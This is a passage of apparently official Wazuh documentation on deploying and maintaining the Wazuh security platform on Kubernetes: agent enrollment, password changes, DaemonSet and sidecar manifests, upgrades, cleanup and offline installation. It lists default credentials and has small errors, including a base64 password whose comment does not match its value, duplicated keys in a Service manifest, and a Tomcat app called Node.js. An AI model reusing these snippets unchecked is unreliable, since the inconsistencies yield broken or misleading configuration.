  2. Set the following Wazuh agent deployment variables to simplify the installation, enrollment, and configuration process of the Wazuh agent.

    • WAZUH_MANAGER: External IP of the wazuh-workers load balancer.

    • WAZUH_REGISTRATION_SERVER: External IP of the wazuh load balancer.

    • WAZUH_REGISTRATION_PASSWORD: The default password for deploying agents in Wazuh on Kubernetes is password. This password is used for enrolling new agents. The /var/ossec/etc/authd.pass file contains this password. For more information, see Using password authentication.

    • WAZUH_AGENT_NAME: Name of the new Wazuh agent to be enrolled.

  3. After setting the deployment variables, install the Wazuh agent using the Wazuh agent installation guide.

  4. The example below shows the command you must run to set the deployment variables and install the Wazuh agent on a Linux endpoint after adding the Wazuh repository.

    # WAZUH_MANAGER="<EXTERNAL_IP_WAZUH_WORKER>" WAZUH_REGISTRATION_SERVER="<EXTERNAL_IP_WAZUH>" WAZUH_REGISTRATION_PASSWORD="<PASSWORD>" WAZUH_AGENT_NAME="WAZUH_K8S_AGENT"  \
      apt-get install wazuh-agent
    

    Replace:

    • EXTERNAL_IP_WAZUH_WORKER with the external IP address of the wazuh-workers load balancer service.

    • EXTERNAL_IP_WAZUH with the external IP address of the wazuh load balancer service.

    • PASSWORD with the password used to enroll agents.

    • WAZUH_K8S_AGENT with the Wazuh agent name that will be used for enrollment

  5. Enable and start the Wazuh agent service.

    # systemctl daemon-reload
    # systemctl enable wazuh-agent
    # systemctl start wazuh-agent
    

To learn more about enrolling Wazuh agents, see the Wazuh agent enrollment section of the documentation.

Accessing Wazuh dashboard

If you created domain names for the services, access the dashboard using the URL https://wazuh.<YOUR_DOMAIN>.com. Otherwise, access the Wazuh dashboard using the external IP address or hostname that your cloud provider assigned.

Check the services to view the external IP:

$ kubectl get services -o wide -n wazuh
NAME                  TYPE           CLUSTER-IP       EXTERNAL-IP                      PORT(S)                          AGE       SELECTOR
dashboard             LoadBalancer   xxx.xx.xxx.xxx   xxx.xx.xxx.xxx                   80:31831/TCP,443:30974/TCP       15m       app=wazuh-dashboard

Note

For a local cluster deployment where the external IP address is not accessible, you can access the Wazuh dashboard using a port-forward as shown below:

# kubectl -n wazuh port-forward --address <KUBERNETES_HOST> service/dashboard 8443:443

Replace <KUBERNETES_HOST> with the IP address of the Kubernetes host.

The Wazuh dashboard is accessible at https://<KUBERNETES_HOST>:8443.

The default credentials are admin:SecretPassword.

Change the password of Wazuh users

Improve security by changing default passwords for Wazuh users. There are two categories of Wazuh users:

Wazuh indexer users

Before starting the password change process, log out of your Wazuh dashboard session. Failing to do so might result in errors when accessing Wazuh after changing user passwords due to persistent session cookies.

To change the password of the default admin and kibanaserver users, do the following.

Warning

If you have custom users, add them to the internal_users.yml file. Otherwise, executing this procedure deletes them.

Set a new password hash
  1. Start a Bash shell in the wazuh-indexer-0 pod.

    # kubectl exec -it wazuh-indexer-0 -n wazuh -- /bin/bash
    
  2. Run these commands to generate the hash of your new password. When prompted, input the new password and press Enter.

    $ export JAVA_HOME=/usr/share/wazuh-indexer/jdk
    $ bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/hash.sh
    

    Warning

    Do not use the $ or & characters in your new password. These characters can cause errors during deployment.

  3. Copy the generated hash and exit the Bash shell.

  4. Open the wazuh/indexer_stack/wazuh-indexer/indexer_conf/internal_users.yml file. Locate the block for the user whose password you want to change and replace the hash:

    • admin user

      ...
      admin:
          hash: "<ADMIN_PASSWORD_HASH>"
          reserved: true
          backend_roles:
          - "admin"
          description: "Demo admin user"
      
      ...
      

      Replace <ADMIN_PASSWORD_HASH> with the password hash generated in the previous step.

    • kibanaserver user

      ...
      kibanaserver:
          hash: "<KIBANASERVER_PASSWORD_HASH>"
          reserved: true
          description: "Demo kibanaserver user"
      
      ...
      

      Replace <KIBANASERVER_PASSWORD_HASH> with the password hash generated in the previous step.

Setting the new password
  1. Encode your new password in base64 format. Use the -n option with the echo command as follows to avoid inserting a trailing newline character to maintain the hash value.

    # echo -n "NewPassword" | base64
    
  2. Edit the indexer or dashbboard secrets configuration file as follows. Replace the value of the password field with the base64 encoded password.

    • To change the admin user password, edit the wazuh/secrets/indexer-cred-secret.yaml file.

      ...
      apiVersion: v1
      kind: Secret
      metadata:
          name: indexer-cred
      data:
          username: YWRtaW4=              # string "admin" base64 encoded
          password: U2VjcmV0UGFzc3dvcmQ=  # string "SecretPassword" base64 encoded
      ...
      
    • To change the kibanaserver user password, edit the wazuh/secrets/dashboard-cred-secret.yaml file.

      ...
      apiVersion: v1
      kind: Secret
      metadata:
          name: dashboard-cred
      data:
          username: a2liYW5hc2VydmVy  # string "kibanaserver" base64 encoded
          password: a2liYW5hc2VydmVy  # string "kibanaserver" base64 encoded
      ...
      
Applying the changes
  1. Apply the manifest changes

    • EKS cluster

      # kubectl apply -k envs/eks/
      
    • Other cluster types

      # kubectl apply -k envs/local-env/
      
  2. Start a new Bash shell in the wazuh-indexer-0 pod.

    # kubectl exec -it wazuh-indexer-0 -n wazuh -- /bin/bash
    
  3. Set the following variables:

    export INSTALLATION_DIR=/usr/share/wazuh-indexer
    export CONFIG_DIR=$INSTALLATION_DIR/config
    CACERT=$CONFIG_DIR/certs/root-ca.pem
    KEY=$CONFIG_DIR/certs/admin-key.pem
    CERT=$CONFIG_DIR/certs/admin.pem
    export JAVA_HOME=/usr/share/wazuh-indexer/jdk
    
  4. Wait for the Wazuh indexer to initialize properly. The waiting time can vary from two to five minutes. It depends on the size of the cluster, the assigned resources, and the speed of the network. Then, run the securityadmin.sh script to apply all changes.

    $ bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -cd $CONFIG_DIR/opensearch-security/ -nhnv -cacert  $CACERT -cert $CERT -key $KEY -p 9200 -icl -h $NODE_NAME
    
  5. Force the Wazuh dashboard deployment rollout to update the component credentials.

    $ kubectl rollout restart deploy/wazuh-dashboard -n wazuh
    
  6. Delete all Wazuh manager pods to update the component credentials.

    $ kubectl delete -n wazuh pod/wazuh-manager-master-0 pod/wazuh-manager-worker-0 pod/wazuh-manager-worker-1
    
  7. Log in to the Wazuh dashboard using the new credentials.

Wazuh server API users

The wazuh-wui user is the default user used to connect to the Wazuh server API. Follow the steps below to change the password.

Note

The password for Wazuh server API users must be between 8 and 64 characters long. It must contain at least one uppercase and one lowercase letter, a number, and a symbol.

  1. Encode your new password in base64 format. Use the -n option with the echo command as follows to avoid inserting a trailing newline character to maintain the hash value.

    # echo -n "NewPassword" | base64
    
  2. Edit the wazuh/secrets/wazuh-api-cred-secret.yaml file and replace the value of the password field.

    apiVersion: v1
    kind: Secret
    metadata:
        name: wazuh-api-cred
        namespace: wazuh
    data:
        username: d2F6dWgtd3Vp          # string "wazuh-wui" base64 encoded
        password: UGFzc3dvcmQxMjM0LmE=  # string "MyS3cr37P450r.*-" base64 encoded
    
  3. Apply the manifest changes.

    # kubectl apply -k envs/eks/
    
  4. Restart the Wazuh dashboard and Wazuh manager master pods.

    # kubectl delete pod wazuh-manager-master-0 wazuh-manager-worker-0-0 wazuh-manager-worker-1-0 wazuh-dashboard-f4d9c7944-httsd
    
Agents

The Wazuh agent can be deployed directly within your Kubernetes environment to monitor workloads, pods, and container activity. This setup provides visibility into the cluster’s runtime behavior, helping detect threats and configuration issues at the container and node levels.

There are two main deployment models for Wazuh agents in Kubernetes:

  • DaemonSet deployment where one Wazuh agent runs on each node to monitor the node and all containers on that node.

  • Sidecar deployment where the Wazuh agent runs as a companion container alongside a specific application pod to monitor that application only.

Deploying the Wazuh Agent as a DaemonSet

This is the most common approach for full-cluster monitoring. Each node runs one agent, ensuring complete coverage without manual intervention when new nodes are added.

  1. Create the Wazuh Agent DaemonSet manifest wazuh-agent-daemonset.yaml:

    apiVersion: v1
    kind: Namespace
    metadata:
      name: wazuh-daemonset
    ---
    apiVersion: apps/v1
    kind: DaemonSet
    metadata:
      name: wazuh-agent
      namespace: wazuh-daemonset
    spec:
      selector:
        matchLabels:
          app: wazuh-agent
      template:
        metadata:
          labels:
            app: wazuh-agent
        spec:
          serviceAccountName: default
          terminationGracePeriodSeconds: 20
    
          #        INIT CONTAINERS
          initContainers:
            # 1) Clean stale PID / lock files
            - name: cleanup-ossec-stale
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Cleaning old locks..."
                  mkdir -p /agent/var/run /agent/queue/ossec
                  rm -f /agent/var/run/*.pid || true
                  rm -f /agent/queue/ossec/*.lock || true
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
            # 2) Seed /var/ossec into hostPath (first run only)
            - name: seed-ossec-tree
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Checking if seeding is required..."
                  if [ ! -d /agent/bin ]; then
                    echo "[init] Seeding /var/ossec to hostPath..."
                    tar -C /var/ossec -cf - . | tar -C /agent -xpf -
                  else
                    echo "[init] Existing data found, skipping seed"
                  fi
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
            # 3) Fix ownership/permissions
            - name: fix-permissions
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Fixing permissions..."
                  for d in etc logs queue var rids tmp "active-response"; do
                    [ -d "/agent/$d" ] && chown -R 999:999 "/agent/$d"
                  done
                  chown -R 0:0 /agent/bin /agent/lib || true
                  find /agent/bin -type f -exec chmod 0755 {} \; || true
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
            # 4) Write ossec.conf with PASSWORD ENROLLMENT
            - name: write-ossec-config
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: WAZUH_PORT
                  value: "1514"
                - name: WAZUH_PROTOCOL
                  value: "tcp"
                - name: WAZUH_REGISTRATION_SERVER
                  value: "<EXTERNAL_IP_WAZUH>"
                - name: WAZUH_REGISTRATION_PORT
                  value: "1515"
                - name: NODE_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: spec.nodeName
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Writing ossec.conf..."
                  mkdir -p /agent/etc
                  cat > /agent/etc/ossec.conf <<EOF
                  <ossec_config>
                    <client>
                      <server>
                        <address>${WAZUH_MANAGER}</address>
                        <port>${WAZUH_PORT}</port>
                        <protocol>${WAZUH_PROTOCOL}</protocol>
                      </server>
                      <enrollment>
                        <enabled>yes</enabled>
                        <agent_name>${NODE_NAME}</agent_name>
                        <manager_address>${WAZUH_REGISTRATION_SERVER}</manager_address>
                        <port>${WAZUH_REGISTRATION_PORT}</port>
                        <authorization_pass_path>/var/ossec/etc/authd.pass</authorization_pass_path>
                      </enrollment>
                    </client>
                  </ossec_config>
                  EOF
                  chown 999:999 /agent/etc/ossec.conf
                  chmod 0640 /agent/etc/ossec.conf
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
    
            # 5) Copy authd.pass from Secret and fix ownership
            - name: fix-authd-pass-perms
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "[init] Copying authd.pass from Secret..."
                  mkdir -p /agent/etc
                  cp /secret/authd.pass /agent/etc/authd.pass
                  chown 0:999 /agent/etc/authd.pass
                  chmod 0640 /agent/etc/authd.pass
                  ls -l /agent/etc/authd.pass
              volumeMounts:
                - name: ossec-data
                  mountPath: /agent
                - name: wazuh-authd-pass
                  mountPath: /secret/authd.pass
                  subPath: authd.pass
                  readOnly: true
    
          #        MAIN CONTAINER
          containers:
            - name: wazuh-agent
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  ln -sf /var/ossec/etc/ossec.conf /etc/ossec.conf || true
                  exec /init
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: NODE_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: spec.nodeName
              securityContext:
                runAsUser: 0
                allowPrivilegeEscalation: true
                capabilities:
                  add: ["SETGID","SETUID"]
              volumeMounts:
                - name: varlog
                  mountPath: /var/log
                  readOnly: true
                - name: ossec-data
                  mountPath: /var/ossec
    
          #            VOLUMES
          volumes:
            - name: varlog
              hostPath:
                path: /var/log
                type: Directory
            - name: ossec-data
              hostPath:
                path: /var/lib/wazuh
                type: DirectoryOrCreate
            - name: wazuh-authd-pass
              secret:
                secretName: wazuh-authd-pass
    

    Replace:

    • <EXTERNAL_IP_WAZUH_WORKER> with the External IP of the wazuh-workers load balancer.

    • <EXTERNAL_IP_WAZUH> with the External IP of the wazuh load balancer.

  2. Create the namespace:

    $ kubectl create namespace wazuh-daemonset
    
  3. Create the Kubernetes secret for the enrollment password:

    $ kubectl create secret generic wazuh-authd-pass \
      -n wazuh-daemonset \
      --from-literal=authd.pass=password
    

    Note

    The default password for enrolling the Wazuh agent in your Kubernetes cluster is password. This value is stored in the /var/ossec/etc/authd.pass file on the Wazuh Manager. For more information, see Using password authentication documentation.

  4. Deploy the Wazuh agent:

    $ kubectl apply -f wazuh-agent-daemonset.yaml
    
  5. Verify that the Wazuh agent was deployed across all nodes with the following command:

    $ kubectl get pods -n wazuh-daemonset -o wide
    
    NAME                READY   STATUS    RESTARTS   AGE   IP          NODE     NOMINATED NODE   READINESS GATES
    wazuh-agent-t2fwl   1/1     Running   0          21m   10.42.0.9   server   <none>           <none>
    
Deploying the Wazuh Agent as a Sidecar

The sidecar approach is ideal for targeted monitoring of sensitive applications or workloads that require isolated log collection. Perform the steps below to deploy Wazuh as a Sidecar:

  1. Modify your application's deployment to include the Wazuh agent container. In the example below, we deploy Wazuh alongside the Apache Tomcat application from the wazuh-agent-sidecar.yaml deployment file:

    apiVersion: v1
    kind: Namespace
    metadata:
      name: wazuh-sidecar
    ---
    apiVersion: apps/v1
    kind: StatefulSet
    metadata:
      name: tomcat-wazuh-agent
      namespace: wazuh-sidecar
    spec:
      serviceName: tomcat-app
      replicas: 1
      selector:
        matchLabels:
          app: tomcat-wazuh-agent
      template:
        metadata:
          labels:
            app: tomcat-wazuh-agent
        spec:
          terminationGracePeriodSeconds: 20
          securityContext:
            fsGroup: 999
            fsGroupChangePolicy: OnRootMismatch
    
          #        INIT CONTAINERS
          initContainers:
            - name: cleanup-ossec-stale
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  mkdir -p /agent/var/run /agent/queue/ossec
                  rm -f /agent/var/run/*.pid || true
                  rm -f /agent/queue/ossec/*.lock || true
                  echo "Cleanup complete. Ready for next init step."
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
    
            - name: seed-ossec-tree
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  if [ ! -d /agent/bin ]; then
                    echo "Seeding /var/ossec into PVC..."
                    tar -C /var/ossec -cf - . | tar -C /agent -xpf -
                  else
                    echo "Existing Wazuh data found, skipping seed."
                  fi
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
    
            - name: write-ossec-config
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: WAZUH_PORT
                  value: "1514"
                - name: WAZUH_PROTOCOL
                  value: "tcp"
                - name: WAZUH_REGISTRATION_SERVER
                  value: "<EXTERNAL_IP_WAZUH>"
                - name: WAZUH_REGISTRATION_PORT
                  value: "1515"
                - name: WAZUH_AGENT_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: metadata.name
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  mkdir -p /agent/etc
                  cat > /agent/etc/ossec.conf <<'EOF'
                  <ossec_config>
                    <client>
                      <server>
                        <address>${WAZUH_MANAGER}</address>
                        <port>${WAZUH_PORT}</port>
                        <protocol>${WAZUH_PROTOCOL}</protocol>
                      </server>
                      <enrollment>
                        <enabled>yes</enabled>
                        <agent_name>${WAZUH_AGENT_NAME}</agent_name>
                        <manager_address>${WAZUH_REGISTRATION_SERVER}</manager_address>
                        <port>${WAZUH_REGISTRATION_PORT}</port>
                        <authorization_pass_path>/var/ossec/etc/authd.pass</authorization_pass_path>
                      </enrollment>
                    </client>
                    <localfile>
                      <log_format>syslog</log_format>
                      <location>/usr/local/tomcat/logs/catalina.out</location>
                    </localfile>
                  </ossec_config>
                  EOF
    
                  sed -i \
                    -e "s|\${WAZUH_MANAGER}|${WAZUH_MANAGER}|g" \
                    -e "s|\${WAZUH_PORT}|${WAZUH_PORT}|g" \
                    -e "s|\${WAZUH_PROTOCOL}|${WAZUH_PROTOCOL}|g" \
                    -e "s|\${WAZUH_REGISTRATION_SERVER}|${WAZUH_REGISTRATION_SERVER}|g" \
                    -e "s|\${WAZUH_REGISTRATION_PORT}|${WAZUH_REGISTRATION_PORT}|g" \
                    -e "s|\${WAZUH_AGENT_NAME}|${WAZUH_AGENT_NAME}|g" \
                    /agent/etc/ossec.conf
    
                  chown 999:999 /agent/etc/ossec.conf
                  chmod 0640 /agent/etc/ossec.conf
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
    
            - name: fix-authd-pass-perms
              image: busybox:1.36
              imagePullPolicy: IfNotPresent
              securityContext:
                runAsUser: 0
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  echo "Copying authd.pass from Secret..."
                  mkdir -p /agent/etc
                  cp /secret/authd.pass /agent/etc/authd.pass
                  chown 0:999 /agent/etc/authd.pass
                  chmod 0640 /agent/etc/authd.pass
                  ls -l /agent/etc/authd.pass
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /agent
                - name: wazuh-authd-pass
                  mountPath: /secret/authd.pass
                  subPath: authd.pass
                  readOnly: true
    
    
          #        MAIN CONTAINERS
          containers:
            - name: tomcat
              image: tomcat:10.1-jdk17
              imagePullPolicy: IfNotPresent
              ports:
                - containerPort: 8080
              volumeMounts:
                - name: application-data
                  mountPath: /usr/local/tomcat/logs
            - name: wazuh-agent
              image: wazuh/wazuh-agent:5.0.0
              imagePullPolicy: IfNotPresent
              lifecycle:
                preStop:
                  exec:
                    command: ["/bin/sh", "-lc", "/var/ossec/bin/ossec-control stop || true; sleep 2"]
              command: ["/bin/sh", "-lc"]
              args:
                - |
                  set -e
                  ln -sf /var/ossec/etc/ossec.conf /etc/ossec.conf
                  exec /init
              env:
                - name: WAZUH_MANAGER
                  value: "<EXTERNAL_IP_WAZUH_WORKER>"
                - name: WAZUH_PORT
                  value: "1514"
                - name: WAZUH_PROTOCOL
                  value: "tcp"
                - name: WAZUH_REGISTRATION_SERVER
                  value: "<EXTERNAL_IP_WAZUH>"
                - name: WAZUH_REGISTRATION_PORT
                  value: "1515"
                - name: WAZUH_AGENT_NAME
                  valueFrom:
                    fieldRef:
                      fieldPath: metadata.name
              securityContext:
                runAsUser: 0
                runAsGroup: 0
              volumeMounts:
                - name: wazuh-agent-data
                  mountPath: /var/ossec
                - name: application-data
                  mountPath: /usr/local/tomcat/logs
    
          #            VOLUMES
          volumes:
            - name: wazuh-authd-pass
              secret:
                secretName: wazuh-authd-pass
      volumeClaimTemplates:
        - metadata:
            name: wazuh-agent-data
          spec:
            accessModes: ["ReadWriteOnce"]
            storageClassName: gp2  # Adjust according to your cluster's StorageClass
            resources:
              requests:
                storage: 3Gi
        - metadata:
            name: application-data
          spec:
            accessModes: ["ReadWriteOnce"]
            storageClassName: gp2  # Adjust according to your cluster's StorageClass
            resources:
              requests:
                storage: 5Gi
    ---
    apiVersion: v1
    kind: Service
    metadata:
      name: tomcat-app
      namespace: wazuh-sidecar
    spec:
      selector:
        app: tomcat-wazuh-agent
      type: NodePort
      ports:
        - protocol: TCP
          port: 80
          targetPort: 8080
          nodePort: 30013
      type: NodePort
      ports:
        - protocol: TCP
          port: 80
          targetPort: 8080
          nodePort: 30013
    

    Note

    Before applying the manifest, confirm the StorageClass names in your cluster by running the command kubectl get sc. In this example, the cluster uses the gp2 StorageClass.

    Replace:

    • <EXTERNAL_IP_WAZUH_WORKER> with the External IP of the wazuh-workers load balancer.

    • <EXTERNAL_IP_WAZUH> with the External IP of the wazuh load balancer.

  2. Create the namespace for the Wazuh agent and the Node.js application:

    # kubectl create namespace wazuh-sidecar
    
  3. Create the Kubernetes secret for the enrollment password:

    $ kubectl create secret generic wazuh-authd-pass \
      -n wazuh-sidecar \
      --from-literal=authd.pass=password
    

    Note

    The default password for enrolling the Wazuh agent in your Kubernetes cluster is password. This value is stored in the /var/ossec/etc/authd.pass file on the Wazuh Manager. For more information, see Using password authentication documentation.

  4. Deploy the sidecar setup:

    # kubectl apply -f wazuh-agent-sidecar.yaml
    
  5. Run the command below to confirm that the tomcat-wazuh-agent pod is running:

    # kubectl get pods -n wazuh-sidecar
    
    NAME                           READY   STATUS     RESTARTS   AGE
    tomcat-wazuh-agent-0   2/2     Running           0          18s
    
Upgrade Wazuh installed in Kubernetes

This section provides a guide to upgrading your Wazuh deployment in a Kubernetes environment while preserving existing configurations and data. Because Wazuh uses persistent volumes and Docker-based components, updates can be performed seamlessly without losing prior settings or logs.

Check files exported to the volume

The Kubernetes deployment uses Wazuh Docker images. The following directories and files are used in the upgrade:

/var/ossec/api/configuration
/var/ossec/etc
/var/ossec/logs
/var/ossec/queue
/var/ossec/var/multigroups
/var/ossec/integrations
/var/ossec/active-response/bin
/var/ossec/agentless
/var/ossec/wodles
/etc/filebeat
/var/lib/filebeat
/usr/share/wazuh-dashboard/config/
/usr/share/wazuh-dashboard/certs/
/var/lib/wazuh-indexer
/usr/share/wazuh-indexer/config/certs/
/usr/share/wazuh-indexer/config/opensearch.yml
/usr/share/wazuh-indexer/config/opensearch-security/internal_users.yml

Any modifications to these files are also made in the associated volume. When a replica pod is created, it gets those files from the volume, keeping the previous changes.

Recreating certificates

Upgrading from a version earlier than v4.8.0 requires you to recreate the SSL certificates. Clone the wazuh-kubernetes repository and check out the v5.0.0 tag. Then, follow the instructions in Setup SSL certificates.

Configuring the upgrade

To upgrade to version 5.0.0, you can follow one of two strategies.

  • Using default manifests : This strategy uses the default manifests for Wazuh 5.0. It replaces the wazuh-kubernetes manifests of your outdated Wazuh version.

  • Keeping custom manifests : This strategy preserves the wazuh-kubernetes manifests of your outdated Wazuh deployment. It ignores the manifests of the latest Wazuh version.

Using default manifests

To upgrade your deployment using the default manifests, perform the following steps.

  1. Checkout the tag for the current version of wazuh-kubernetes:

    # git checkout v5.0.0
    
  2. Apply the new configuration.

Keeping custom manifests

The following approach allows administrators to preserve their existing deployment configurations instead of overwriting them with the default manifests from the new version. This method is ideal for environments with custom settings, resource allocations, network policies, or integrations that must remain intact during the upgrade.

The upgrade process differs slightly depending on your current Wazuh version.

  1. If you are upgrading from version 4.3, update the Java Opts variable name with the new one.

  2. Update old paths with the new ones.

  3. If you are upgrading from a version earlier than 4.8, update configuration parameters.

  4. Modify tags of Wazuh images.

Next, apply the new configuration.

Updating Java Opts variable name
  1. If you are upgrading from version 4.3, you must replace ES_JAVA_OPTS with OPENSEARCH_JAVA_OPTS and modify the value.

    • wazuh/wazuh_managers/wazuh-master-sts.yaml

      env:
        - name: OPENSEARCH_JAVA_OPTS
          value: '-Xms1g -Xmx1g -Dlog4j2.formatMsgNoLookups=true'
      
Updating old paths

Wazuh dashboard

  1. Edit wazuh/indexer_stack/wazuh-dashboard/dashboard-deploy.yaml and do the following replacements.

    • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

  2. Edit wazuh/indexer_stack/wazuh-dashboard/dashboard_conf/opensearch_dashboards.yml and do the following replacements.

    • Replace /usr/share/wazuh-dashboard/config/certs/ with /usr/share/wazuh-dashboard/certs/.

Wazuh indexer

  1. Edit wazuh/indexer_stack/wazuh-indexer/cluster/indexer-sts.yaml and do the following replacements.

    • Replace /usr/share/wazuh-indexer/plugins/opensearch-security/securityconfig/ with /usr/share/wazuh-indexer/opensearch-security/.

    • Add the following statements:

      volumes:
      - name: indexer-certs
         secret:
            secretName: indexer-certs
            defaultMode: 0600
      - name: indexer-conf
         configMap:
            name: indexer-conf
            defaultMode: 0600
      
      spec:
         securityContext:
           fsGroup: 1000
         # Set the wazuh-indexer volume permissions so the wazuh-indexer user can use it
         volumes:
         - name: indexer-certs
      
      securityContext:
         runAsUser: 1000
         runAsGroup: 1000
         capabilities:
            add: ["SYS_CHROOT"]
      
Updating configuration parameters
  1. Update the defaultRoute parameter in the Wazuh dashboard configuration.

    • wazuh/indexer_stack/wazuh-dashboard/dashboard_conf/opensearch_dashboards.yml.

      uiSettings.overrides.defaultRoute: /app/wz-home
      
  2. Edit opensearch.yml and modify CN for Wazuh indexer.

    • wazuh/indexer_stack/wazuh-indexer/indexer_conf/opensearch.yml

      plugins.security.nodes_dn:
        - CN=indexer,O=Company,L=California,C=US
      
  3. Edit the following files and modify all Wazuh indexer URLs in the deployment.

    • wazuh/indexer_stack/wazuh-dashboard/dashboard-deploy.yaml

      env:
        - name: INDEXER_URL
          value: 'https://indexer:9200'
      
    • wazuh/wazuh_managers/wazuh-master-sts.yaml

      env:
        - name: INDEXER_URL
          value: 'https://indexer:9200'
      
    • wazuh/wazuh_managers/wazuh-worker-sts.yaml

      env:
        - name: INDEXER_URL
          value: 'https://indexer:9200'
      
  4. Edit the following files of the v5.0.0 tag and apply all the customizations from your Wazuh manager ossec.conf file.

    • wazuh/wazuh_managers/wazuh_conf/master.conf

    • wazuh/wazuh_managers/wazuh_conf/worker.conf

Modifying tags of Wazuh images

Modify the tag of Wazuh images in the different statefulsets and deployments.

image: 'wazuh/wazuh-dashboard:5.0.0'
image: 'wazuh/wazuh-manager:5.0.0'
image: 'wazuh/wazuh-indexer:5.0.0'
Apply the new configuration

The last step is to apply the new configuration:

  • EKS cluster

    $ kubectl apply -k envs/eks/
    
  • Other cluster types

    $ kubectl apply -k envs/local-env/
    
 statefulset.apps "wazuh-manager-master" configured

This process will end the old pod while creating a new one with the new version, linked to the same volume. Once the Pods are booted, the update will be ready, and we can check the new version of Wazuh installed, the cluster, and the changes that have been maintained through the use of the volumes.

Clean Up

When you no longer need your Wazuh Kubernetes deployment or want a fresh deployment, it is important to properly remove all resources to prevent orphaned configurations or volumes from consuming cluster resources.

This section outlines the steps required to completely clean up your environment, including deleting StatefulSets, services, ConfigMaps, and persistent volumes associated with the Wazuh cluster.

Follow the steps below to delete all deployments, services, and volumes.

  1. Remove the entire cluster

    The deployment of the Wazuh cluster of managers involves the use of different StatefulSet elements as well as configuration maps and services.

    To delete your Wazuh cluster, execute the following command from the repository directory.

    • EKS cluster

      $ kubectl delete -k envs/eks/
      
    • Other cluster types

      $ kubectl delete -k envs/local-env/
      

    This will remove every resource defined on the kustomization.yml file.

  2. Remove the persistent volumes.

    $ kubectl get persistentvolume
    
    NAME                                       CAPACITY   ACCESS MODES   RECLAIM POLICY   STATUS        CLAIM                                                         STORAGECLASS             REASON    AGE
    pvc-024466da-f7c5-11e8-b9b8-022ada63b4ac   10Gi       RWO            Retain           Released      wazuh/wazuh-manager-worker-wazuh-manager-worker-1-0           gp2-encrypted-retained             6d
    pvc-b3226ad3-f7c4-11e8-b9b8-022ada63b4ac   30Gi       RWO            Retain           Bound         wazuh/wazuh-indexer-wazuh-indexer-0                           gp2-encrypted-retained             6d
    pvc-fb821971-f7c4-11e8-b9b8-022ada63b4ac   10Gi       RWO            Retain           Released      wazuh/wazuh-manager-master-wazuh-manager-master-0             gp2-encrypted-retained             6d
    pvc-ffe7bf66-f7c4-11e8-b9b8-022ada63b4ac   10Gi       RWO            Retain           Released      wazuh/wazuh-manager-worker-wazuh-manager-worker-0-0           gp2-encrypted-retained             6d
    
    $ kubectl delete persistentvolume pvc-b3226ad3-f7c4-11e8-b9b8-022ada63b4ac
    

    Repeat the kubectl delete command to delete all Wazuh related persistent volumes.

Warning

Do not forget to delete the volumes manually where necessary.

Offline installation guide

You can install Wazuh even without an Internet connection. Installing the solution offline involves first downloading the Wazuh central components on a system with Internet access, then transferring and installing them on the offline system. Wazuh supports both all-in-one and distributed deployments. The Wazuh server, indexer, and dashboard can run on the same host in an all-in-one setup, or be installed on separate hosts for a distributed deployment. It supports 64-bit architectures, including x86_64/AMD64 and AARCH64/ARM64.

For more information about the hardware requirements and the recommended operating systems, check the Requirements section.

Note

You need root user privileges to run all the commands described below.

Prerequisites
  • curl, tar, and setcap need to be installed in the target system where the offline installation will be carried out. gnupg might need to be installed as well for some Debian-based systems.

  • In some systems, the command cp is an alias for cp -i — you can check this by running alias cp. If this is your case, use unalias cp to avoid being asked for confirmation to overwrite files.

Download the packages and configuration files

From a Linux system with Internet access, run the script below to download all files needed for offline installation. Choose the package format (RPM or DEB) and architecture (x86_64/AMD64 or AARCH64/ARM64).

  1. Run the command on any Linux system with Internet access to download and prepare the Wazuh offline installer script

    # curl -sO https://packages.wazuh.com/5.0/wazuh-install.sh
    
    # chmod 744 wazuh-install.sh
    
  2. Download packages by architecture and format

    x86_64 / AMD64

    # ./wazuh-install.sh -dw rpm -da x86_64
    

    AARCH64 / ARM64

    # ./wazuh-install.sh -dw rpm -da aarch64
    
  3. Download the certificates configuration file.

    # curl -sO https://packages.wazuh.com/5.0/config.yml
    
  4. Edit config.yml to prepare the certificates creation.

